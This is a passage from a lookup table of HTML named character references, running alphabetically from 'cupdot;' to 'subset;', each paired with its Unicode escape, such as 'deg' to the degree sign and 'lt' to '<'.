"cupdot;": "\u228d",
"cupor;": "\u2a45",
"cups;": "\u222a\ufe00",
"curarr;": "\u21b7",
"curarrm;": "\u293c",
"curlyeqprec;": "\u22de",
"curlyeqsucc;": "\u22df",
"curlyvee;": "\u22ce",
"curlywedge;": "\u22cf",
"curren": "\xa4",
"curren;": "\xa4",
"curvearrowleft;": "\u21b6",
"curvearrowright;": "\u21b7",
"cuvee;": "\u22ce",
"cuwed;": "\u22cf",
"cwconint;": "\u2232",
"cwint;": "\u2231",
"cylcty;": "\u232d",
"dArr;": "\u21d3",
"dHar;": "\u2965",
"dagger;": "\u2020",
"daleth;": "\u2138",
"darr;": "\u2193",
"dash;": "\u2010",
"dashv;": "\u22a3",
"dbkarow;": "\u290f",
"dblac;": "\u02dd",
"dcaron;": "\u010f",
"dcy;": "\u0434",
"dd;": "\u2146",
"ddagger;": "\u2021",
"ddarr;": "\u21ca",
"ddotseq;": "\u2a77",
"deg": "\xb0",
"deg;": "\xb0",
"delta;": "\u03b4",
"demptyv;": "\u29b1",
"dfisht;": "\u297f",
"dfr;": "\U0001d521",
"dharl;": "\u21c3",
"dharr;": "\u21c2",
"diam;": "\u22c4",
"diamond;": "\u22c4",
"diamondsuit;": "\u2666",
"diams;": "\u2666",
"die;": "\xa8",
"digamma;": "\u03dd",
"disin;": "\u22f2",
"div;": "\xf7",
"divide": "\xf7",
"divide;": "\xf7",
"divideontimes;": "\u22c7",
"divonx;": "\u22c7",
"djcy;": "\u0452",
"dlcorn;": "\u231e",
"dlcrop;": "\u230d",
"dollar;": "$",
"dopf;": "\U0001d555",
"dot;": "\u02d9",
"doteq;": "\u2250",
"doteqdot;": "\u2251",
"dotminus;": "\u2238",
"dotplus;": "\u2214",
"dotsquare;": "\u22a1",
"doublebarwedge;": "\u2306",
"downarrow;": "\u2193",
"downdownarrows;": "\u21ca",
"downharpoonleft;": "\u21c3",
"downharpoonright;": "\u21c2",
"drbkarow;": "\u2910",
"drcorn;": "\u231f",
"drcrop;": "\u230c",
"dscr;": "\U0001d4b9",
"dscy;": "\u0455",
"dsol;": "\u29f6",
"dstrok;": "\u0111",
"dtdot;": "\u22f1",
"dtri;": "\u25bf",
"dtrif;": "\u25be",
"duarr;": "\u21f5",
"duhar;": "\u296f",
"dwangle;": "\u29a6",
"dzcy;": "\u045f",
"dzigrarr;": "\u27ff",
"eDDot;": "\u2a77",
"eDot;": "\u2251",
"eacute": "\xe9",
"eacute;": "\xe9",
"easter;": "\u2a6e",
"ecaron;": "\u011b",
"ecir;": "\u2256",
"ecirc": "\xea",
"ecirc;": "\xea",
"ecolon;": "\u2255",
"ecy;": "\u044d",
"edot;": "\u0117",
"ee;": "\u2147",
"efDot;": "\u2252",
"efr;": "\U0001d522",
"eg;": "\u2a9a",
"egrave": "\xe8",
"egrave;": "\xe8",
"egs;": "\u2a96",
"egsdot;": "\u2a98",
"el;": "\u2a99",
"elinters;": "\u23e7",
"ell;": "\u2113",
"els;": "\u2a95",
"elsdot;": "\u2a97",
"emacr;": "\u0113",
"empty;": "\u2205",
"emptyset;": "\u2205",
"emptyv;": "\u2205",
"emsp13;": "\u2004",
"emsp14;": "\u2005",
"emsp;": "\u2003",
"eng;": "\u014b",
"ensp;": "\u2002",
"eogon;": "\u0119",
"eopf;": "\U0001d556",
"epar;": "\u22d5",
"eparsl;": "\u29e3",
"eplus;": "\u2a71",
"epsi;": "\u03b5",
"epsilon;": "\u03b5",
"epsiv;": "\u03f5",
"eqcirc;": "\u2256",
"eqcolon;": "\u2255",
"eqsim;": "\u2242",
"eqslantgtr;": "\u2a96",
"eqslantless;": "\u2a95",
"equals;": "=",
"equest;": "\u225f",
"equiv;": "\u2261",
"equivDD;": "\u2a78",
"eqvparsl;": "\u29e5",
"erDot;": "\u2253",
"erarr;": "\u2971",
"escr;": "\u212f",
"esdot;": "\u2250",
"esim;": "\u2242",
"eta;": "\u03b7",
"eth": "\xf0",
"eth;": "\xf0",
"euml": "\xeb",
"euml;": "\xeb",
"euro;": "\u20ac",
"excl;": "!",
"exist;": "\u2203",
"expectation;": "\u2130",
"exponentiale;": "\u2147",
"fallingdotseq;": "\u2252",
"fcy;": "\u0444",
"female;": "\u2640",
"ffilig;": "\ufb03",
"fflig;": "\ufb00",
"ffllig;": "\ufb04",
"ffr;": "\U0001d523",
"filig;": "\ufb01",
"fjlig;": "fj",
"flat;": "\u266d",
"fllig;": "\ufb02",
"fltns;": "\u25b1",
"fnof;": "\u0192",
"fopf;": "\U0001d557",
"forall;": "\u2200",
"fork;": "\u22d4",
"forkv;": "\u2ad9",
"fpartint;": "\u2a0d",
"frac12": "\xbd",
"frac12;": "\xbd",
"frac13;": "\u2153",
"frac14": "\xbc",
"frac14;": "\xbc",
"frac15;": "\u2155",
"frac16;": "\u2159",
"frac18;": "\u215b",
"frac23;": "\u2154",
"frac25;": "\u2156",
"frac34": "\xbe",
"frac34;": "\xbe",
"frac35;": "\u2157",
"frac38;": "\u215c",
"frac45;": "\u2158",
"frac56;": "\u215a",
"frac58;": "\u215d",
"frac78;": "\u215e",
"frasl;": "\u2044",
"frown;": "\u2322",
"fscr;": "\U0001d4bb",
"gE;": "\u2267",
"gEl;": "\u2a8c",
"gacute;": "\u01f5",
"gamma;": "\u03b3",
"gammad;": "\u03dd",
"gap;": "\u2a86",
"gbreve;": "\u011f",
"gcirc;": "\u011d",
"gcy;": "\u0433",
"gdot;": "\u0121",
"ge;": "\u2265",
"gel;": "\u22db",
"geq;": "\u2265",
"geqq;": "\u2267",
"geqslant;": "\u2a7e",
"ges;": "\u2a7e",
"gescc;": "\u2aa9",
"gesdot;": "\u2a80",
"gesdoto;": "\u2a82",
"gesdotol;": "\u2a84",
"gesl;": "\u22db\ufe00",
"gesles;": "\u2a94",
"gfr;": "\U0001d524",
"gg;": "\u226b",
"ggg;": "\u22d9",
"gimel;": "\u2137",
"gjcy;": "\u0453",
"gl;": "\u2277",
"glE;": "\u2a92",
"gla;": "\u2aa5",
"glj;": "\u2aa4",
"gnE;": "\u2269",
"gnap;": "\u2a8a",
"gnapprox;": "\u2a8a",
"gne;": "\u2a88",
"gneq;": "\u2a88",
"gneqq;": "\u2269",
"gnsim;": "\u22e7",
"gopf;": "\U0001d558",
"grave;": "`",
"gscr;": "\u210a",
"gsim;": "\u2273",
"gsime;": "\u2a8e",
"gsiml;": "\u2a90",
"gt": ">",
"gt;": ">",
"gtcc;": "\u2aa7",
"gtcir;": "\u2a7a",
"gtdot;": "\u22d7",
"gtlPar;": "\u2995",
"gtquest;": "\u2a7c",
"gtrapprox;": "\u2a86",
"gtrarr;": "\u2978",
"gtrdot;": "\u22d7",
"gtreqless;": "\u22db",
"gtreqqless;": "\u2a8c",
"gtrless;": "\u2277",
"gtrsim;": "\u2273",
"gvertneqq;": "\u2269\ufe00",
"gvnE;": "\u2269\ufe00",
"hArr;": "\u21d4",
"hairsp;": "\u200a",
"half;": "\xbd",
"hamilt;": "\u210b",
"hardcy;": "\u044a",
"harr;": "\u2194",
"harrcir;": "\u2948",
"harrw;": "\u21ad",
"hbar;": "\u210f",
"hcirc;": "\u0125",
"hearts;": "\u2665",
"heartsuit;": "\u2665",
"hellip;": "\u2026",
"hercon;": "\u22b9",
"hfr;": "\U0001d525",
"hksearow;": "\u2925",
"hkswarow;": "\u2926",
"hoarr;": "\u21ff",
"homtht;": "\u223b",
"hookleftarrow;": "\u21a9",
"hookrightarrow;": "\u21aa",
"hopf;": "\U0001d559",
"horbar;": "\u2015",
"hscr;": "\U0001d4bd",
"hslash;": "\u210f",
"hstrok;": "\u0127",
"hybull;": "\u2043",
"hyphen;": "\u2010",
"iacute": "\xed",
"iacute;": "\xed",
"ic;": "\u2063",
"icirc": "\xee",
"icirc;": "\xee",
"icy;": "\u0438",
"iecy;": "\u0435",
"iexcl": "\xa1",
"iexcl;": "\xa1",
"iff;": "\u21d4",
"ifr;": "\U0001d526",
"igrave": "\xec",
"igrave;": "\xec",
"ii;": "\u2148",
"iiiint;": "\u2a0c",
"iiint;": "\u222d",
"iinfin;": "\u29dc",
"iiota;": "\u2129",
"ijlig;": "\u0133",
"imacr;": "\u012b",
"image;": "\u2111",
"imagline;": "\u2110",
"imagpart;": "\u2111",
"imath;": "\u0131",
"imof;": "\u22b7",
"imped;": "\u01b5",
"in;": "\u2208",
"incare;": "\u2105",
"infin;": "\u221e",
"infintie;": "\u29dd",
"inodot;": "\u0131",
"int;": "\u222b",
"intcal;": "\u22ba",
"integers;": "\u2124",
"intercal;": "\u22ba",
"intlarhk;": "\u2a17",
"intprod;": "\u2a3c",
"iocy;": "\u0451",
"iogon;": "\u012f",
"iopf;": "\U0001d55a",
"iota;": "\u03b9",
"iprod;": "\u2a3c",
"iquest": "\xbf",
"iquest;": "\xbf",
"iscr;": "\U0001d4be",
"isin;": "\u2208",
"isinE;": "\u22f9",
"isindot;": "\u22f5",
"isins;": "\u22f4",
"isinsv;": "\u22f3",
"isinv;": "\u2208",
"it;": "\u2062",
"itilde;": "\u0129",
"iukcy;": "\u0456",
"iuml": "\xef",
"iuml;": "\xef",
"jcirc;": "\u0135",
"jcy;": "\u0439",
"jfr;": "\U0001d527",
"jmath;": "\u0237",
"jopf;": "\U0001d55b",
"jscr;": "\U0001d4bf",
"jsercy;": "\u0458",
"jukcy;": "\u0454",
"kappa;": "\u03ba",
"kappav;": "\u03f0",
"kcedil;": "\u0137",
"kcy;": "\u043a",
"kfr;": "\U0001d528",
"kgreen;": "\u0138",
"khcy;": "\u0445",
"kjcy;": "\u045c",
"kopf;": "\U0001d55c",
"kscr;": "\U0001d4c0",
"lAarr;": "\u21da",
"lArr;": "\u21d0",
"lAtail;": "\u291b",
"lBarr;": "\u290e",
"lE;": "\u2266",
"lEg;": "\u2a8b",
"lHar;": "\u2962",
"lacute;": "\u013a",
"laemptyv;": "\u29b4",
"lagran;": "\u2112",
"lambda;": "\u03bb",
"lang;": "\u27e8",
"langd;": "\u2991",
"langle;": "\u27e8",
"lap;": "\u2a85",
"laquo": "\xab",
"laquo;": "\xab",
"larr;": "\u2190",
"larrb;": "\u21e4",
"larrbfs;": "\u291f",
"larrfs;": "\u291d",
"larrhk;": "\u21a9",
"larrlp;": "\u21ab",
"larrpl;": "\u2939",
"larrsim;": "\u2973",
"larrtl;": "\u21a2",
"lat;": "\u2aab",
"latail;": "\u2919",
"late;": "\u2aad",
"lates;": "\u2aad\ufe00",
"lbarr;": "\u290c",
"lbbrk;": "\u2772",
"lbrace;": "{",
"lbrack;": "[",
"lbrke;": "\u298b",
"lbrksld;": "\u298f",
"lbrkslu;": "\u298d",
"lcaron;": "\u013e",
"lcedil;": "\u013c",
"lceil;": "\u2308",
"lcub;": "{",
"lcy;": "\u043b",
"ldca;": "\u2936",
"ldquo;": "\u201c",
"ldquor;": "\u201e",
"ldrdhar;": "\u2967",
"ldrushar;": "\u294b",
"ldsh;": "\u21b2",
"le;": "\u2264",
"leftarrow;": "\u2190",
"leftarrowtail;": "\u21a2",
"leftharpoondown;": "\u21bd",
"leftharpoonup;": "\u21bc",
"leftleftarrows;": "\u21c7",
"leftrightarrow;": "\u2194",
"leftrightarrows;": "\u21c6",
"leftrightharpoons;": "\u21cb",
"leftrightsquigarrow;": "\u21ad",
"leftthreetimes;": "\u22cb",
"leg;": "\u22da",
"leq;": "\u2264",
"leqq;": "\u2266",
"leqslant;": "\u2a7d",
"les;": "\u2a7d",
"lescc;": "\u2aa8",
"lesdot;": "\u2a7f",
"lesdoto;": "\u2a81",
"lesdotor;": "\u2a83",
"lesg;": "\u22da\ufe00",
"lesges;": "\u2a93",
"lessapprox;": "\u2a85",
"lessdot;": "\u22d6",
"lesseqgtr;": "\u22da",
"lesseqqgtr;": "\u2a8b",
"lessgtr;": "\u2276",
"lesssim;": "\u2272",
"lfisht;": "\u297c",
"lfloor;": "\u230a",
"lfr;": "\U0001d529",
"lg;": "\u2276",
"lgE;": "\u2a91",
"lhard;": "\u21bd",
"lharu;": "\u21bc",
"lharul;": "\u296a",
"lhblk;": "\u2584",
"ljcy;": "\u0459",
"ll;": "\u226a",
"llarr;": "\u21c7",
"llcorner;": "\u231e",
"llhard;": "\u296b",
"lltri;": "\u25fa",
"lmidot;": "\u0140",
"lmoust;": "\u23b0",
"lmoustache;": "\u23b0",
"lnE;": "\u2268",
"lnap;": "\u2a89",
"lnapprox;": "\u2a89",
"lne;": "\u2a87",
"lneq;": "\u2a87",
"lneqq;": "\u2268",
"lnsim;": "\u22e6",
"loang;": "\u27ec",
"loarr;": "\u21fd",
"lobrk;": "\u27e6",
"longleftarrow;": "\u27f5",
"longleftrightarrow;": "\u27f7",
"longmapsto;": "\u27fc",
"longrightarrow;": "\u27f6",
"looparrowleft;": "\u21ab",
"looparrowright;": "\u21ac",
"lopar;": "\u2985",
"lopf;": "\U0001d55d",
"loplus;": "\u2a2d",
"lotimes;": "\u2a34",
"lowast;": "\u2217",
"lowbar;": "_",
"loz;": "\u25ca",
"lozenge;": "\u25ca",
"lozf;": "\u29eb",
"lpar;": "(",
"lparlt;": "\u2993",
"lrarr;": "\u21c6",
"lrcorner;": "\u231f",
"lrhar;": "\u21cb",
"lrhard;": "\u296d",
"lrm;": "\u200e",
"lrtri;": "\u22bf",
"lsaquo;": "\u2039",
"lscr;": "\U0001d4c1",
"lsh;": "\u21b0",
"lsim;": "\u2272",
"lsime;": "\u2a8d",
"lsimg;": "\u2a8f",
"lsqb;": "[",
"lsquo;": "\u2018",
"lsquor;": "\u201a",
"lstrok;": "\u0142",
"lt": "<",
"lt;": "<",
"ltcc;": "\u2aa6",
"ltcir;": "\u2a79",
"ltdot;": "\u22d6",
"lthree;": "\u22cb",
"ltimes;": "\u22c9",
"ltlarr;": "\u2976",
"ltquest;": "\u2a7b",
"ltrPar;": "\u2996",
"ltri;": "\u25c3",
"ltrie;": "\u22b4",
"ltrif;": "\u25c2",
"lurdshar;": "\u294a",
"luruhar;": "\u2966",
"lvertneqq;": "\u2268\ufe00",
"lvnE;": "\u2268\ufe00",
"mDDot;": "\u223a",
"macr": "\xaf",
"macr;": "\xaf",
"male;": "\u2642",
"malt;": "\u2720",
"maltese;": "\u2720",
"map;": "\u21a6",
"mapsto;": "\u21a6",
"mapstodown;": "\u21a7",
"mapstoleft;": "\u21a4",
"mapstoup;": "\u21a5",
"marker;": "\u25ae",
"mcomma;": "\u2a29",
"mcy;": "\u043c",
"mdash;": "\u2014",
"measuredangle;": "\u2221",
"mfr;": "\U0001d52a",
"mho;": "\u2127",
"micro": "\xb5",
"micro;": "\xb5",
"mid;": "\u2223",
"midast;": "*",
"midcir;": "\u2af0",
"middot": "\xb7",
"middot;": "\xb7",
"minus;": "\u2212",
"minusb;": "\u229f",
"minusd;": "\u2238",
"minusdu;": "\u2a2a",
"mlcp;": "\u2adb",
"mldr;": "\u2026",
"mnplus;": "\u2213",
"models;": "\u22a7",
"mopf;": "\U0001d55e",
"mp;": "\u2213",
"mscr;": "\U0001d4c2",
"mstpos;": "\u223e",
"mu;": "\u03bc",
"multimap;": "\u22b8",
"mumap;": "\u22b8",
"nGg;": "\u22d9\u0338",
"nGt;": "\u226b\u20d2",
"nGtv;": "\u226b\u0338",
"nLeftarrow;": "\u21cd",
"nLeftrightarrow;": "\u21ce",
"nLl;": "\u22d8\u0338",
"nLt;": "\u226a\u20d2",
"nLtv;": "\u226a\u0338",
"nRightarrow;": "\u21cf",
"nVDash;": "\u22af",
"nVdash;": "\u22ae",
"nabla;": "\u2207",
"nacute;": "\u0144",
"nang;": "\u2220\u20d2",
"nap;": "\u2249",
"napE;": "\u2a70\u0338",
"napid;": "\u224b\u0338",
"napos;": "\u0149",
"napprox;": "\u2249",
"natur;": "\u266e",
"natural;": "\u266e",
"naturals;": "\u2115",
"nbsp": "\xa0",
"nbsp;": "\xa0",
"nbump;": "\u224e\u0338",
"nbumpe;": "\u224f\u0338",
"ncap;": "\u2a43",
"ncaron;": "\u0148",
"ncedil;": "\u0146",
"ncong;": "\u2247",
"ncongdot;": "\u2a6d\u0338",
"ncup;": "\u2a42",
"ncy;": "\u043d",
"ndash;": "\u2013",
"ne;": "\u2260",
"neArr;": "\u21d7",
"nearhk;": "\u2924",
"nearr;": "\u2197",
"nearrow;": "\u2197",
"nedot;": "\u2250\u0338",
"nequiv;": "\u2262",
"nesear;": "\u2928",
"nesim;": "\u2242\u0338",
"nexist;": "\u2204",
"nexists;": "\u2204",
"nfr;": "\U0001d52b",
"ngE;": "\u2267\u0338",
"nge;": "\u2271",
"ngeq;": "\u2271",
"ngeqq;": "\u2267\u0338",
"ngeqslant;": "\u2a7e\u0338",
"nges;": "\u2a7e\u0338",
"ngsim;": "\u2275",
"ngt;": "\u226f",
"ngtr;": "\u226f",
"nhArr;": "\u21ce",
"nharr;": "\u21ae",
"nhpar;": "\u2af2",
"ni;": "\u220b",
"nis;": "\u22fc",
"nisd;": "\u22fa",
"niv;": "\u220b",
"njcy;": "\u045a",
"nlArr;": "\u21cd",
"nlE;": "\u2266\u0338",
"nlarr;": "\u219a",
"nldr;": "\u2025",
"nle;": "\u2270",
"nleftarrow;": "\u219a",
"nleftrightarrow;": "\u21ae",
"nleq;": "\u2270",
"nleqq;": "\u2266\u0338",
"nleqslant;": "\u2a7d\u0338",
"nles;": "\u2a7d\u0338",
"nless;": "\u226e",
"nlsim;": "\u2274",
"nlt;": "\u226e",
"nltri;": "\u22ea",
"nltrie;": "\u22ec",
"nmid;": "\u2224",
"nopf;": "\U0001d55f",
"not": "\xac",
"not;": "\xac",
"notin;": "\u2209",
"notinE;": "\u22f9\u0338",
"notindot;": "\u22f5\u0338",
"notinva;": "\u2209",
"notinvb;": "\u22f7",
"notinvc;": "\u22f6",
"notni;": "\u220c",
"notniva;": "\u220c",
"notnivb;": "\u22fe",
"notnivc;": "\u22fd",
"npar;": "\u2226",
"nparallel;": "\u2226",
"nparsl;": "\u2afd\u20e5",
"npart;": "\u2202\u0338",
"npolint;": "\u2a14",
"npr;": "\u2280",
"nprcue;": "\u22e0",
"npre;": "\u2aaf\u0338",
"nprec;": "\u2280",
"npreceq;": "\u2aaf\u0338",
"nrArr;": "\u21cf",
"nrarr;": "\u219b",
"nrarrc;": "\u2933\u0338",
"nrarrw;": "\u219d\u0338",
"nrightarrow;": "\u219b",
"nrtri;": "\u22eb",
"nrtrie;": "\u22ed",
"nsc;": "\u2281",
"nsccue;": "\u22e1",
"nsce;": "\u2ab0\u0338",
"nscr;": "\U0001d4c3",
"nshortmid;": "\u2224",
"nshortparallel;": "\u2226",
"nsim;": "\u2241",
"nsime;": "\u2244",
"nsimeq;": "\u2244",
"nsmid;": "\u2224",
"nspar;": "\u2226",
"nsqsube;": "\u22e2",
"nsqsupe;": "\u22e3",
"nsub;": "\u2284",
"nsubE;": "\u2ac5\u0338",
"nsube;": "\u2288",
"nsubset;": "\u2282\u20d2",
"nsubseteq;": "\u2288",
"nsubseteqq;": "\u2ac5\u0338",
"nsucc;": "\u2281",
"nsucceq;": "\u2ab0\u0338",
"nsup;": "\u2285",
"nsupE;": "\u2ac6\u0338",
"nsupe;": "\u2289",
"nsupset;": "\u2283\u20d2",
"nsupseteq;": "\u2289",
"nsupseteqq;": "\u2ac6\u0338",
"ntgl;": "\u2279",
"ntilde": "\xf1",
"ntilde;": "\xf1",
"ntlg;": "\u2278",
"ntriangleleft;": "\u22ea",
"ntrianglelefteq;": "\u22ec",
"ntriangleright;": "\u22eb",
"ntrianglerighteq;": "\u22ed",
"nu;": "\u03bd",
"num;": "#",
"numero;": "\u2116",
"numsp;": "\u2007",
"nvDash;": "\u22ad",
"nvHarr;": "\u2904",
"nvap;": "\u224d\u20d2",
"nvdash;": "\u22ac",
"nvge;": "\u2265\u20d2",
"nvgt;": ">\u20d2",
"nvinfin;": "\u29de",
"nvlArr;": "\u2902",
"nvle;": "\u2264\u20d2",
"nvlt;": "<\u20d2",
"nvltrie;": "\u22b4\u20d2",
"nvrArr;": "\u2903",
"nvrtrie;": "\u22b5\u20d2",
"nvsim;": "\u223c\u20d2",
"nwArr;": "\u21d6",
"nwarhk;": "\u2923",
"nwarr;": "\u2196",
"nwarrow;": "\u2196",
"nwnear;": "\u2927",
"oS;": "\u24c8",
"oacute": "\xf3",
"oacute;": "\xf3",
"oast;": "\u229b",
"ocir;": "\u229a",
"ocirc": "\xf4",
"ocirc;": "\xf4",
"ocy;": "\u043e",
"odash;": "\u229d",
"odblac;": "\u0151",
"odiv;": "\u2a38",
"odot;": "\u2299",
"odsold;": "\u29bc",
"oelig;": "\u0153",
"ofcir;": "\u29bf",
"ofr;": "\U0001d52c",
"ogon;": "\u02db",
"ograve": "\xf2",
"ograve;": "\xf2",
"ogt;": "\u29c1",
"ohbar;": "\u29b5",
"ohm;": "\u03a9",
"oint;": "\u222e",
"olarr;": "\u21ba",
"olcir;": "\u29be",
"olcross;": "\u29bb",
"oline;": "\u203e",
"olt;": "\u29c0",
"omacr;": "\u014d",
"omega;": "\u03c9",
"omicron;": "\u03bf",
"omid;": "\u29b6",
"ominus;": "\u2296",
"oopf;": "\U0001d560",
"opar;": "\u29b7",
"operp;": "\u29b9",
"oplus;": "\u2295",
"or;": "\u2228",
"orarr;": "\u21bb",
"ord;": "\u2a5d",
"order;": "\u2134",
"orderof;": "\u2134",
"ordf": "\xaa",
"ordf;": "\xaa",
"ordm": "\xba",
"ordm;": "\xba",
"origof;": "\u22b6",
"oror;": "\u2a56",
"orslope;": "\u2a57",
"orv;": "\u2a5b",
"oscr;": "\u2134",
"oslash": "\xf8",
"oslash;": "\xf8",
"osol;": "\u2298",
"otilde": "\xf5",
"otilde;": "\xf5",
"otimes;": "\u2297",
"otimesas;": "\u2a36",
"ouml": "\xf6",
"ouml;": "\xf6",
"ovbar;": "\u233d",
"par;": "\u2225",
"para": "\xb6",
"para;": "\xb6",
"parallel;": "\u2225",
"parsim;": "\u2af3",
"parsl;": "\u2afd",
"part;": "\u2202",
"pcy;": "\u043f",
"percnt;": "%",
"period;": ".",
"permil;": "\u2030",
"perp;": "\u22a5",
"pertenk;": "\u2031",
"pfr;": "\U0001d52d",
"phi;": "\u03c6",
"phiv;": "\u03d5",
"phmmat;": "\u2133",
"phone;": "\u260e",
"pi;": "\u03c0",
"pitchfork;": "\u22d4",
"piv;": "\u03d6",
"planck;": "\u210f",
"planckh;": "\u210e",
"plankv;": "\u210f",
"plus;": "+",
"plusacir;": "\u2a23",
"plusb;": "\u229e",
"pluscir;": "\u2a22",
"plusdo;": "\u2214",
"plusdu;": "\u2a25",
"pluse;": "\u2a72",
"plusmn": "\xb1",
"plusmn;": "\xb1",
"plussim;": "\u2a26",
"plustwo;": "\u2a27",
"pm;": "\xb1",
"pointint;": "\u2a15",
"popf;": "\U0001d561",
"pound": "\xa3",
"pound;": "\xa3",
"pr;": "\u227a",
"prE;": "\u2ab3",
"prap;": "\u2ab7",
"prcue;": "\u227c",
"pre;": "\u2aaf",
"prec;": "\u227a",
"precapprox;": "\u2ab7",
"preccurlyeq;": "\u227c",
"preceq;": "\u2aaf",
"precnapprox;": "\u2ab9",
"precneqq;": "\u2ab5",
"precnsim;": "\u22e8",
"precsim;": "\u227e",
"prime;": "\u2032",
"primes;": "\u2119",
"prnE;": "\u2ab5",
"prnap;": "\u2ab9",
"prnsim;": "\u22e8",
"prod;": "\u220f",
"profalar;": "\u232e",
"profline;": "\u2312",
"profsurf;": "\u2313",
"prop;": "\u221d",
"propto;": "\u221d",
"prsim;": "\u227e",
"prurel;": "\u22b0",
"pscr;": "\U0001d4c5",
"psi;": "\u03c8",
"puncsp;": "\u2008",
"qfr;": "\U0001d52e",
"qint;": "\u2a0c",
"qopf;": "\U0001d562",
"qprime;": "\u2057",
"qscr;": "\U0001d4c6",
"quaternions;": "\u210d",
"quatint;": "\u2a16",
"quest;": "?",
"questeq;": "\u225f",
"quot": "\"",
"quot;": "\"",
"rAarr;": "\u21db",
"rArr;": "\u21d2",
"rAtail;": "\u291c",
"rBarr;": "\u290f",
"rHar;": "\u2964",
"race;": "\u223d\u0331",
"racute;": "\u0155",
"radic;": "\u221a",
"raemptyv;": "\u29b3",
"rang;": "\u27e9",
"rangd;": "\u2992",
"range;": "\u29a5",
"rangle;": "\u27e9",
"raquo": "\xbb",
"raquo;": "\xbb",
"rarr;": "\u2192",
"rarrap;": "\u2975",
"rarrb;": "\u21e5",
"rarrbfs;": "\u2920",
"rarrc;": "\u2933",
"rarrfs;": "\u291e",
"rarrhk;": "\u21aa",
"rarrlp;": "\u21ac",
"rarrpl;": "\u2945",
"rarrsim;": "\u2974",
"rarrtl;": "\u21a3",
"rarrw;": "\u219d",
"ratail;": "\u291a",
"ratio;": "\u2236",
"rationals;": "\u211a",
"rbarr;": "\u290d",
"rbbrk;": "\u2773",
"rbrace;": "}",
"rbrack;": "]",
"rbrke;": "\u298c",
"rbrksld;": "\u298e",
"rbrkslu;": "\u2990",
"rcaron;": "\u0159",
"rcedil;": "\u0157",
"rceil;": "\u2309",
"rcub;": "}",
"rcy;": "\u0440",
"rdca;": "\u2937",
"rdldhar;": "\u2969",
"rdquo;": "\u201d",
"rdquor;": "\u201d",
"rdsh;": "\u21b3",
"real;": "\u211c",
"realine;": "\u211b",
"realpart;": "\u211c",
"reals;": "\u211d",
"rect;": "\u25ad",
"reg": "\xae",
"reg;": "\xae",
"rfisht;": "\u297d",
"rfloor;": "\u230b",
"rfr;": "\U0001d52f",
"rhard;": "\u21c1",
"rharu;": "\u21c0",
"rharul;": "\u296c",
"rho;": "\u03c1",
"rhov;": "\u03f1",
"rightarrow;": "\u2192",
"rightarrowtail;": "\u21a3",
"rightharpoondown;": "\u21c1",
"rightharpoonup;": "\u21c0",
"rightleftarrows;": "\u21c4",
"rightleftharpoons;": "\u21cc",
"rightrightarrows;": "\u21c9",
"rightsquigarrow;": "\u219d",
"rightthreetimes;": "\u22cc",
"ring;": "\u02da",
"risingdotseq;": "\u2253",
"rlarr;": "\u21c4",
"rlhar;": "\u21cc",
"rlm;": "\u200f",
"rmoust;": "\u23b1",
"rmoustache;": "\u23b1",
"rnmid;": "\u2aee",
"roang;": "\u27ed",
"roarr;": "\u21fe",
"robrk;": "\u27e7",
"ropar;": "\u2986",
"ropf;": "\U0001d563",
"roplus;": "\u2a2e",
"rotimes;": "\u2a35",
"rpar;": ")",
"rpargt;": "\u2994",
"rppolint;": "\u2a12",
"rrarr;": "\u21c9",
"rsaquo;": "\u203a",
"rscr;": "\U0001d4c7",
"rsh;": "\u21b1",
"rsqb;": "]",
"rsquo;": "\u2019",
"rsquor;": "\u2019",
"rthree;": "\u22cc",
"rtimes;": "\u22ca",
"rtri;": "\u25b9",
"rtrie;": "\u22b5",
"rtrif;": "\u25b8",
"rtriltri;": "\u29ce",
"ruluhar;": "\u2968",
"rx;": "\u211e",
"sacute;": "\u015b",
"sbquo;": "\u201a",
"sc;": "\u227b",
"scE;": "\u2ab4",
"scap;": "\u2ab8",
"scaron;": "\u0161",
"sccue;": "\u227d",
"sce;": "\u2ab0",
"scedil;": "\u015f",
"scirc;": "\u015d",
"scnE;": "\u2ab6",
"scnap;": "\u2aba",
"scnsim;": "\u22e9",
"scpolint;": "\u2a13",
"scsim;": "\u227f",
"scy;": "\u0441",
"sdot;": "\u22c5",
"sdotb;": "\u22a1",
"sdote;": "\u2a66",
"seArr;": "\u21d8",
"searhk;": "\u2925",
"searr;": "\u2198",
"searrow;": "\u2198",
"sect": "\xa7",
"sect;": "\xa7",
"semi;": ";",
"seswar;": "\u2929",
"setminus;": "\u2216",
"setmn;": "\u2216",
"sext;": "\u2736",
"sfr;": "\U0001d530",
"sfrown;": "\u2322",
"sharp;": "\u266f",
"shchcy;": "\u0449",
"shcy;": "\u0448",
"shortmid;": "\u2223",
"shortparallel;": "\u2225",
"shy": "\xad",
"shy;": "\xad",
"sigma;": "\u03c3",
"sigmaf;": "\u03c2",
"sigmav;": "\u03c2",
"sim;": "\u223c",
"simdot;": "\u2a6a",
"sime;": "\u2243",
"simeq;": "\u2243",
"simg;": "\u2a9e",
"simgE;": "\u2aa0",
"siml;": "\u2a9d",
"simlE;": "\u2a9f",
"simne;": "\u2246",
"simplus;": "\u2a24",
"simrarr;": "\u2972",
"slarr;": "\u2190",
"smallsetminus;": "\u2216",
"smashp;": "\u2a33",
"smeparsl;": "\u29e4",
"smid;": "\u2223",
"smile;": "\u2323",
"smt;": "\u2aaa",
"smte;": "\u2aac",
"smtes;": "\u2aac\ufe00",
"softcy;": "\u044c",
"sol;": "/",
"solb;": "\u29c4",
"solbar;": "\u233f",
"sopf;": "\U0001d564",
"spades;": "\u2660",
"spadesuit;": "\u2660",
"spar;": "\u2225",
"sqcap;": "\u2293",
"sqcaps;": "\u2293\ufe00",
"sqcup;": "\u2294",
"sqcups;": "\u2294\ufe00",
"sqsub;": "\u228f",
"sqsube;": "\u2291",
"sqsubset;": "\u228f",
"sqsubseteq;": "\u2291",
"sqsup;": "\u2290",
"sqsupe;": "\u2292",
"sqsupset;": "\u2290",
"sqsupseteq;": "\u2292",
"squ;": "\u25a1",
"square;": "\u25a1",
"squarf;": "\u25aa",
"squf;": "\u25aa",
"srarr;": "\u2192",
"sscr;": "\U0001d4c8",
"ssetmn;": "\u2216",
"ssmile;": "\u2323",
"sstarf;": "\u22c6",
"star;": "\u2606",
"starf;": "\u2605",
"straightepsilon;": "\u03f5",
"straightphi;": "\u03d5",
"strns;": "\xaf",
"sub;": "\u2282",
"subE;": "\u2ac5",
"subdot;": "\u2abd",
"sube;": "\u2286",
"subedot;": "\u2ac3",
"submult;": "\u2ac1",
"subnE;": "\u2acb",
"subne;": "\u228a",
"subplus;": "\u2abf",
"subrarr;": "\u2979",
"subset;": "\u2282",
